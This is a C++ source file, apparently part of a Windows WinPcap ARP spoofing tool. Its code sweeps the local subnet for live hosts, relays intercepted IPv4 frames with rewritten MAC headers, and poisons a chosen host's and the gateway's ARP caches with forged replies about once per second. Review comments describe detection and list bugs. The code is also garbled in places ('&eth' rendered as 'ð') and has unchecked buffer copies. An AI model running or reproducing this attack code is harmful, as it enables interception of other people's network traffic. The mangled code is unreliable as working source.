📄 arpsproof.cpp
u_char * pkt_data;
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x0f;
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;
arp.arp_spa=inet_addr("127.0.0.2"); //随便设的请求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend succeed\n\n");
}
else
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
while((k=pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>=0)
{
if(*(unsigned short *)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac[i]=*(unsigned char*)(pkt_data+22+i);
}
break;
}
}
if(i==6)
{
return 1;
}
else
{
return 0;
}
}
// Sends one broadcast ARP request for every address in the local subnet, using
// this host's own IP/MAC (myip) as the sender. Replies are not read here.
// The signature (void* argument, _stdcall) suggests a thread entry point; x is
// unused.
// Returns 1 after the whole range has been sent, 0 on the first send failure.
// On the wire this is a burst of broadcast ARP requests from a single sender
// walking consecutive target addresses, which per-port ARP rate monitoring on
// a switch or IDS can flag.
unsigned int _stdcall sendpackettogetallacttiveIpwithMac(void *x)
{
ULONG tip,subnetsta,subnetend;
// NOTE(review): 42 = 14-byte Ethernet header + 28-byte ARP payload. This assumes
// ETHDR and ARPHDR are declared packed with exactly those sizes (declarations
// are not visible here); otherwise the memcpy at sendbuf+sizeof(eth) overruns.
unsigned char sendbuf[42];
int k;
ETHDR eth;
ARPHDR arp;
// myip->ip appears to be kept in network byte order (it is written to arp_spa
// unchanged below), so htonl() is used here as a byte swap to host order.
subnetsta=htonl(myip->ip&mynetmask); // compute the first address of the local subnet (host order)
subnetend=htonl(htonl(subnetsta)|(~mynetmask)); // compute the last address of the local subnet (host order)
// Ethernet: broadcast destination, own MAC as source. ARP: own MAC as sender
// hardware address, all-zero target hardware address (unknown, being asked for).
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
// NOTE(review): "ð" is not valid C; it is presumably "&eth" mangled by HTML
// entity decoding when the page was rendered ("&eth" is the entity for ð).
memcpy(sendbuf,ð,sizeof(eth));
// The range is inclusive at both ends, so the network and broadcast addresses
// are queried too.
// NOTE(review): tip<=subnetend never becomes false if subnetend is 0xFFFFFFFF
// (netmask of 0), because tip wraps around.
for(tip=subnetsta;tip<=subnetend;tip++)
{
arp.arp_tpa=htonl(tip);
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
// NOTE(review): pcap reports its errors through pcap_geterr(); GetLastError()
// is not guaranteed to describe a pcap_sendpacket failure.
printf("Getallactive ip PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
}
return 1;
}
// Reads captured frames from slecadopt and, for every ARP reply addressed to
// this host's IP, appends a node holding the replier's IP and MAC to the
// global list headed by Pipmachead.
// The signature suggests a thread entry point; x is unused. Always returns 1.
// The loop ends when pcap_next_ex() returns 0 or a negative value (so a read
// timeout also ends it), or when Ssendover is 1 after a packet was handled.
// The recorded IP/MAC pairs come straight from unauthenticated ARP replies and
// are not de-duplicated or validated.
unsigned int _stdcall recvpackettogetallacttiveIpwithMac(void *x)
{
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
PacttiveIpwithMac p,q;
int i;
while((pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>0)
{
// Offsets into the raw frame: 12 = EtherType, 20 = ARP opcode,
// 38 = ARP target protocol address (must equal our own IP).
// NOTE(review): pkt_header->caplen is never checked, so a frame shorter than
// 42 bytes is read past its end. The casts also read 2- and 4-byte values at
// addresses that are not guaranteed to be aligned, and the 4-byte reads rely on
// unsigned long being 32 bits (true on Windows, which this code targets).
if(*(unsigned short *)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned long*)(pkt_data+38)==myip->ip)
{
p=new acttiveIpwithMac;
p->next=NULL;
// 28 = ARP sender protocol address, 22..27 = ARP sender hardware address.
p->ip=*(unsigned long*)(pkt_data+28);
for(i=0;i<6;i++)
{
p->mac[i]=*(unsigned char*)(pkt_data+22+i);
}
// q tracks the tail of the list.
// NOTE(review): q is only initialised in the branch that creates the head. If
// Pipmachead is already non-NULL when this function starts, the first
// q->next=p writes through an uninitialised pointer.
if(Pipmachead==NULL)
{
Pipmachead=p;
q=p;
}
else
{
q->next=p;
q=p;
}
}
// Ssendover is presumably set by the sending thread when the sweep is done
// (not visible here). NOTE(review): it is read without any synchronisation,
// and it is only tested after a packet has been received.
if(Ssendover==1)
{
return 1;
}
}
return 1;
}
// Relay loop: captures IPv4 frames that were not sent by this host, are not
// addressed to this host's IP and are not Ethernet broadcasts, rewrites their
// Ethernet destination/source MACs and re-sends them on the same adapter.
// The destination MAC becomes the MAC of the list entry whose IP equals the
// packet's destination IP, or the gateway's MAC when no entry matches; the
// source MAC is always this host's MAC.
// The signature suggests a thread entry point; x is unused. Returns 1 only
// after pcap_next_ex() reports an error (negative return).
// Seen from the network, the relayed frames carry this host's MAC as Ethernet
// source while their IP source address belongs to another host, a mismatch
// that switch-level source validation can detect.
unsigned int _stdcall transmitandsniffer(void *x)
{
// 12 bytes = destination MAC followed by source MAC, i.e. the first 12 bytes
// of an Ethernet header.
struct changemac
{
unsigned char mac[12];
};
unsigned char bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned char sendbuf[1600];
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
changemac *cmac,*togatewaymac;
PacttiveIpwithMac z;
int i,j;
// NOTE(review): both allocations are never released, not even on the return
// path at the end of the function.
cmac=new changemac;
togatewaymac=new changemac;
// Default header: destination = gateway MAC, source = own MAC.
memcpy(togatewaymac->mac,gateip->mac,6);
memcpy(togatewaymac->mac+6,myip->mac,6);
//printf("1have run to here!!!\n");
while((j=pcap_next_ex(slecadopt,&pkt_header,(const u_char**)&pkt_data))>=0)
{
// 0 means the read timed out without a packet; keep waiting.
if(j==0)
{
//printf("2have run to here!!!\n");
continue;
}
// Offsets: 12 = EtherType, 6..11 = source MAC, 0..5 = destination MAC,
// 30 = IPv4 destination address (assumes the IPv4 header directly follows a
// 14-byte Ethernet header, i.e. no VLAN tag).
// NOTE(review): caplen is not checked before these reads, so a frame shorter
// than 34 bytes is read past its end.
if(*(unsigned short *)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned long *)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))//(*(unsigned char*)(pkt_data+6)==myip->mac[0]&&*(unsigned char*)(pkt_data+7)==myip->mac[1]&&*(unsigned char*)(pkt_data+8)==myip->mac[2]&&*(unsigned char*)(pkt_data+9)==myip->mac[3]&&*(unsigned char*)(pkt_data+10)==myip->mac[4]&&*(unsigned char*)(pkt_data+11)==myip->mac[5])))
{
//if()//(!(*(unsigned char*)(pkt_data+0)==0xff&&*(unsigned char*)(pkt_data+1)==0xff&&*(unsigned char*)(pkt_data+2)==0xff&&*(unsigned char*)(pkt_data+3)==0xff&&*(unsigned char*)(pkt_data+4)==0xff&&*(unsigned char*)(pkt_data+5)==0xff))&&)
//{ //for(i=0;i<6;i++)
// printf("%02x:",*(unsigned char*)(pkt_data+i));
//printf("33have run to here!!!\n");
// NOTE(review): caplen is copied into a fixed 1600-byte stack buffer without a
// bound check. If the capture handle's snapshot length allows frames larger
// than 1600 bytes (the open call is not visible here), this overflows sendbuf.
memcpy(sendbuf,pkt_data,pkt_header->caplen);
// Start from the default (gateway) header; it is replaced below when the
// destination IP belongs to a host in the discovered list.
memcpy(sendbuf,togatewaymac,12);
for(z=Pipmachead;z!=NULL;z=z->next)
{//printf("444have run to here!!!\n");
if(*(unsigned long *)(pkt_data+30)==z->ip)
{
// Leftover from the commented-out copy loops below; i is not used afterwards.
i=0;
//printf("jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjip=%s",iptos(z->ip));
//for(;i<6;i++)
//cmac->mac[i]=z->mac[i];
memcpy(cmac->mac,z->mac,6);
//for(;i<12;i++)
//cmac->mac[i]=myip->mac[i-6];
memcpy(cmac->mac+6,myip->mac,6);
//memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,cmac,12);
/*if(*///!=0)
break;
//{
// printf("tansmit Error: %d\n",GetLastError());
// return 0;
// }
}
}
// NOTE(review): the return value is ignored, so failed sends are dropped
// silently. The list is also walked here without synchronisation against the
// code that appends to it.
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);
//}//printf("getip:%s len:%d\n",iptos(*(unsigned long *)(pkt_data+30)),pkt_header->caplen);
}
}
return 1;
}
// ARP cache poisoning loop for one host from the discovered list.
// x points to an int holding the 1-based position of that host in the list
// headed by Pipmachead. The function prebuilds four 42-byte ARP reply frames:
//   sendbuftogate  - to the gateway: "host IP is at this machine's MAC"
//   sendbuftosp    - to the host:    "gateway IP is at this machine's MAC"
//   rsendbuftosp   - to the host:    gateway IP with the gateway's real MAC
//   rsendbuftogate - to the gateway: host IP with the host's real MAC
// It then sends the first two roughly once per second until cheat[i-1] is 0,
// sends the two restoring frames ten times each and returns 1.
// Returns 0 as soon as a send fails; in that case no restoring frames are sent.
// Defensive view: both peers receive unsolicited ARP replies about once per
// second that rebind a known IP to a different MAC. ARP monitoring (for example
// arpwatch), Dynamic ARP Inspection on the switch, or a static ARP entry for
// the gateway detect or block this.
unsigned int _stdcall sproof(void *x)
{
int j,i=*(int*)x;
// NOTE(review): 42 bytes assumes ETHDR is 14 and ARPHDR 28 bytes with no
// padding (declarations not visible here).
unsigned char sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];
PacttiveIpwithMac spip;
ETHDR eth;
ARPHDR arp;
int k;
// Walk to the i-th list entry (empty loop body).
// NOTE(review): there is no NULL check. If i is larger than the list length the
// walk dereferences NULL, and for i<=0 spip stays at Pipmachead (possibly NULL)
// while cheat[i-1] below indexes before the start of the array.
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);
printf("%-3d ip=%-20s mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
// Frame 1 (sendbuftogate): addressed to the gateway, sender IP = host's IP,
// sender MAC = this machine's MAC.
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
// NOTE(review): "ð" here and in the three copies below is not valid C; it is
// presumably "&eth" mangled by HTML entity decoding when the page was rendered.
memcpy(sendbuftogate,ð,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
// Frame 2 (sendbuftosp): addressed to the host, sender IP = gateway's IP,
// sender MAC = this machine's MAC.
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,ð,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
// Frame 3 (rsendbuftosp): restores the host's entry for the gateway. Both the
// Ethernet source and the ARP sender MAC are set to the gateway's real MAC, so
// this frame is sent with a source MAC that is not this adapter's own.
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,ð,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
// Frame 4 (rsendbuftogate): restores the gateway's entry for the host, again
// with the host's real MAC as Ethernet source and ARP sender MAC.
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,ð,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
// Console message (Chinese): "spoofing of host number %d has started".
printf("已经进入%d号机的欺骗!!!\n",i);
while(TRUE)
{
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
// NOTE(review): pcap reports its errors through pcap_geterr(); GetLastError()
// is not guaranteed to describe a pcap_sendpacket failure. The same applies to
// the other three error branches below.
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
// The 980 ms pause sets the repeat interval of the forged replies.
Sleep(980);
// cheat[] is presumably cleared by another thread to stop this loop (not
// visible here); it is read without synchronisation.
if(cheat[i-1]==0) // restore the ARP caches of the spoofed target and the gateway
{
for(j=10;j>0;j--)
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
}
// Console message (Chinese): "spoofing of host number %d has stopped".
printf("已经退出对%d号机的欺骗!!!\n",i);
return 1;
}
}
}